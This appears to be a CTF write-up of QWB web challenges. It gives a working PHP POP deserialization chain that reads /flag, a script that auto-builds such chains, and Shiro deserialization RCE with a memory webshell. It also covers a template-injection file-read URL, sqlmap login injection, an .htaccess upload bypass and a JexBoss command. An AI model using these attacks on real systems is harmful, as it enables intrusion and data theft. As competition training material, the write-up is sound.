强网杯 (QWB CTF): Selected Web Write-ups

Web

赌徒 (Gambler)

It looks like files can be read almost trivially; just read /flag directly...

```php
<?php
// Challenge classes followed by the chain construction. The chain fires as:
//   unserialize() -> Start::__wakeup() -> Start::_sayhello() echoes $name (an Info object)
//   -> Info::__toString() reads $this->file['filename']->ffiillee (a Room, undefined property)
//   -> Room::__get() calls $this->a() (the other Room) -> Room::__invoke() -> Get_hint($filename)
//   -> the base64 of the file's contents is echoed.

class Start
{
    public $name;
    public $flag='syst3m("cat 127.0.0.1/etc/hint");';  // decoy string shipped with the challenge

    public function _sayhello(){
        echo $this->name;      // $name is an object, so this triggers its __toString()
        return 'ok';
    }

    public function __wakeup(){
        //echo "hi";
        $this->_sayhello();
    }
    public function __get($cc){
        echo "give you flag : ".$this->flag;
        return ;
    }
}

class Info
{
    private $phonenumber=123123;
    public $promise='I do';

    public function __toString(){
        // $this->file is a dynamic property set below; ->ffiillee is undefined on Room -> __get()
        return $this->file['filename']->ffiillee['ffiilleennaammee'];
    }
}

class Room
{
    public $filename='/flag';
    public $sth_to_set;
    public $a='';

    public function __get($name){
        $function = $this->a;
        return $function();    // $a holds an object, so this calls its __invoke()
    }

    public function Get_hint($file){
        $hint=base64_encode(file_get_contents($file));
        echo $hint;
        return ;
    }

    public function __invoke(){
        $content = $this->Get_hint($this->filename);
        echo $content;
    }
}

// Build the chain: $r1 is the callable Room (its __invoke reads $filename),
// $r2 is the Room whose __get() returns $r1().
$r1 = new Room;
$r1->filename = '/etc/passwd';   // local test; on the target the path is /flag
$r2 = new Room;
$r2->a = $r1;

$s = new Start;
$i = new Info;

$i->file['filename'] = $r2;      // dynamic property read by Info::__toString()

$s->name = $i;

// Info has a private property, so the serialized form contains NUL bytes; urlencode it.
print_r(urlencode(serialize($s))."\r\n");

// Local check that the chain fires.
unserialize(serialize($s));
```

pop_master

Use PHP-Parser to generate the AST and store it in a.json.

Then write a Python script that BFSes for a path through the classes, pruning in an extremely brute-force way...

The script is as follows:

```python
import json
import queue

# AST produced by PHP-Parser (one entry per class), dumped to a.json.
ast = json.load(open('a.json', 'r', encoding='utf-8'))

# class name -> class node
classes = {}
for node in ast:
    classes[node['name']['name']] = node

# method name -> owning class (the challenge's method names are globally unique)
f2cTable = {}
#ban_function = ['YkN508','frZNkk','N3R1ow','N3R1ow','CCO4GN','LCG9b8','ILnKZX']
ban_function = []   # methods to exclude once a found chain turns out to be a dead end

for pclass in ast:
    for f in pclass["stmts"]:
        if f['nodeType'] == "Stmt_ClassMethod":
            f2cTable[f['name']['name']] = pclass['name']['name']

visit_function = {}   # (class name + method name) -> visited

q = queue.SimpleQueue()

class State:
    def __init__(self, curClassName, curFunctionName, father):
        self.className = curClassName
        self.functionName = curFunctionName
        self.father = father   # previous State in the chain (None for the entry point)

# Entry point: the class/method reached first from unserialize()
initState = State('MoAUb1', "HsGsAu", None)

def printTree(s: State):
    # Emit the PHP that instantiates the chain, innermost object first; each parent's
    # first declared property is set to the child object.
    ret = f"$my{s.className} = new {s.className};\r\n"
    father = s.father
    while father is not None:
        tmp = f"$my{father.className} = new {father.className};\r\n"
        tmp += f"$my{father.className}->{classes[father.className]['stmts'][0]['props'][0]['name']['name']} = $my{s.className};\r\n"
        s = father
        father = father.father
        ret += tmp
    print(ret)

q.put(initState)

while not q.empty():
    curState = q.get()
    key = curState.className + curState.functionName
    if key in visit_function:    # the original used hasattr() on the dict, which never matched
        continue
    visit_function[key] = True
    if curState.functionName in ban_function:
        continue
    cur_function = None
    for f in classes[curState.className]["stmts"]:
        if f['nodeType'] == "Stmt_ClassMethod" and f['name']['name'] == curState.functionName:
            cur_function = f
            break

    # name of the first parameter: the value the chain passes along
    cur_param = cur_function['params'][0]['var']['name'] if cur_function['params'] else None

    for stmt in cur_function['stmts']:
        if stmt['nodeType'] == 'Stmt_Expression':
            expr = stmt['expr']
            if expr['nodeType'] == "Expr_Assign" and expr['var'].get('name') == cur_param:
                # the parameter is overwritten before it can be passed on: prune this branch
                print(expr['var']['name'], cur_param)
                break
            elif expr['nodeType'] == "Expr_Eval":
                printTree(curState)   # sink reached: print the chain and stop
                exit(0)
            elif expr['nodeType'] == "Expr_MethodCall":
                next_f = expr['name']['name']
                q.put(State(f2cTable[next_f], next_f, curState))
        elif stmt['nodeType'] == 'Stmt_For':
            # a loop that reassigns the parameter is treated as a dead end too
            flag = 0
            for forstmt in stmt['stmts']:
                if forstmt['nodeType'] == 'Stmt_Expression':
                    if forstmt['expr'].get("var", {}).get("name") == cur_param:
                        flag = 1
                        break
            if flag == 1:
                break
        elif stmt['nodeType'] == 'Stmt_If':
            # condition of the form func(..., 'methodName'): the string literal names the next method
            if stmt['cond']['nodeType'] == "Expr_FuncCall":
                next_f = stmt['cond']['args'][1]['value']['value']
                q.put(State(f2cTable[next_f], next_f, curState))
```

The POP chain is generated automatically and then fired by hand.
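As an added example (not the write-up's script), the same eval-reachability search written as a function over a small constructed PHP-Parser-style AST: it keeps the script's rules (a method that overwrites its parameter is a dead end; a method call or an if-condition whose second argument is a method-name literal is a hop) but uses a real visited set and returns the chain instead of printing it. The class names A/B/C/D, the method names run/step/go/dead and the AST-building helpers are constructed for the example; the JSON shape is assumed to match a.json.

```python
from collections import deque
# Constructed PHP-Parser-style AST (assumption: the same JSON shape as the write-up's a.json).
def cls(name, prop, *methods):
    return {"name": {"name": name}, "stmts": [
        {"nodeType": "Stmt_Property", "props": [{"name": {"name": prop}}]}, *methods]}
def meth(name, param, *stmts):
    return {"nodeType": "Stmt_ClassMethod", "name": {"name": name},
            "params": [{"var": {"name": param}}], "stmts": list(stmts)}
def call(m):    # $this->prop->m(...): the next hop of the chain
    return {"nodeType": "Stmt_Expression", "expr": {"nodeType": "Expr_MethodCall", "name": {"name": m}}}
def assign(v):  # $v = ...: overwrites the value the chain passes along
    return {"nodeType": "Stmt_Expression", "expr": {"nodeType": "Expr_Assign", "var": {"name": v}}}
def guarded(m):  # if (func(..., 'm')): the string literal in the 2nd argument names the next method
    return {"nodeType": "Stmt_If", "stmts": [], "cond": {"nodeType": "Expr_FuncCall",
            "args": [{"value": {}}, {"value": {"value": m}}]}}
EVAL = {"nodeType": "Stmt_Expression", "expr": {"nodeType": "Expr_Eval"}}
SAMPLE_AST = [
    cls("A", "next", meth("run", "x", call("dead"), call("step"))),
    cls("B", "obj", meth("step", "y", guarded("go"))),
    cls("C", "p", meth("go", "z", EVAL)),
    cls("D", "q", meth("dead", "w", assign("w"), call("go"))),  # also reaches go(), but clobbers $w first
]
def find_chain(ast, entry_class, entry_method):
    # BFS from the entry (class, method) to the first Expr_Eval; returns the (class, method) path or None.
    classes = {c["name"]["name"]: c for c in ast}
    owner = {m["name"]["name"]: c["name"]["name"] for c in ast      # method -> class; assumes method
             for m in c["stmts"] if m["nodeType"] == "Stmt_ClassMethod"}  # names are globally unique
    start = (entry_class, entry_method)
    queue, seen = deque([[start]]), {start}   # queue holds whole paths; seen prevents cycles/revisits
    while queue:
        path = queue.popleft()
        cur = path[-1]
        def enqueue(m):   # first arrival wins, so the first sink found lies on a shortest chain
            if m in owner and (owner[m], m) not in seen:
                seen.add((owner[m], m))
                queue.append(path + [(owner[m], m)])
        fn = next(f for f in classes[cur[0]]["stmts"]
                  if f["nodeType"] == "Stmt_ClassMethod" and f["name"]["name"] == cur[1])
        param = fn["params"][0]["var"]["name"] if fn["params"] else None
        for stmt in fn["stmts"]:
            kind = stmt["expr"]["nodeType"] if stmt["nodeType"] == "Stmt_Expression" else None
            if kind == "Expr_Eval":
                return path                      # sink reached
            if kind == "Expr_Assign" and stmt["expr"]["var"].get("name") == param:
                break                            # controlled value clobbered: dead end, prune
            if kind == "Expr_MethodCall":
                enqueue(stmt["expr"]["name"]["name"])
            elif stmt["nodeType"] == "Stmt_If" and stmt["cond"]["nodeType"] == "Expr_FuncCall":
                enqueue(stmt["cond"]["args"][1]["value"]["value"])
    return None
```

On the sample the D branch is enqueued first but pruned, so the returned chain is A::run -> B::step -> C::go.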

Hard_Penetration

The entry point is a login page, and the response sets the cookie rememberMe=deleteMe.
That clearly indicates the Apache Shiro framework, so try the Shiro deserialization attack; this needs the AES key, which is usually the hard-coded default.


The key is hard-coded, giving RCE directly. After injecting a Behinder (冰蝎) in-memory webshell:
netstat, together with ports.conf, shows another web service listening on port 8005.

Proxying it out from the internal network shows a CMS with an admin backend, and the backend identifies itself as juhucms.

This CMS also allows directory listing, and its directory structure is identical to baoCMS. Downloading the source and auditing it, in the template handling code:

This is quite similar to the 74cms template injection. Tracing the callers of fetch upward:

display calls fetch; display is normally the template rendering step, so we need a reachable route where templateFile is controllable. A global search:

All of these CommonAction classes have this method, but many are guarded by authentication that requires a backend login, and neither the default nor weak passwords seem to get in. In the wap module, however:

This route is accessible and requires no authentication, so we just construct the request:

http://127.0.0.1:8005/wap/common/show?templateFile=/flag

EasyWeb

On entry a hint says the port is in the range 30000-50000; a port scan finds 36842.
It is a login page, but the username field is injectable; sqlmap dumps it directly, giving:

admin 99f609527226e076d668668582ac4420
After logging in and poking around: the challenge is described as easy_SSRF, but the backend has a /file endpoint that allows file uploads...
File contents and names are filtered. Upload a .htaccess containing
AddHandler php5-script aaa
and then upload a file named aaa.aaa.

Upload a webshell, then look at what the other players have done and at netstat.


Port 8006 has JBoss running, and it runs as root; the flag is readable only by root.

JexBoss takes it directly.

Though after I got a reverse shell and used it locally, I had root but could not execute commands; a teammate tried and it worked.

python3 .\jexboss.py -u http://127.0.0.1:8006

Then cat the flag directly.

寻宝 (Treasure Hunt)

Part 1: the bypass is as follows:

Part 2: download with IDM and search globally for KEY2.

```python
import os
import shutil
import docx  # python-docx

dir_path = "five_month"

for root, dirs, files in os.walk(dir_path):
    for filename in files:
        filepath = os.path.join(root, filename)
        if filename.endswith(".docx"):
            # Concatenate all paragraph text of the document and look for the marker.
            document = docx.Document(filepath)
            fulltext = ''.join(p.text for p in document.paragraphs)
            raw = fulltext.encode()
            if b"KEY2" in raw:
                # Dump the matching document's text next to the script for inspection.
                with open(filename + ".png", "wb") as o:
                    o.write(raw)
        if filename.endswith(".png"):
            # Collect every loose png into the working directory.
            shutil.copy(filepath, filename)
```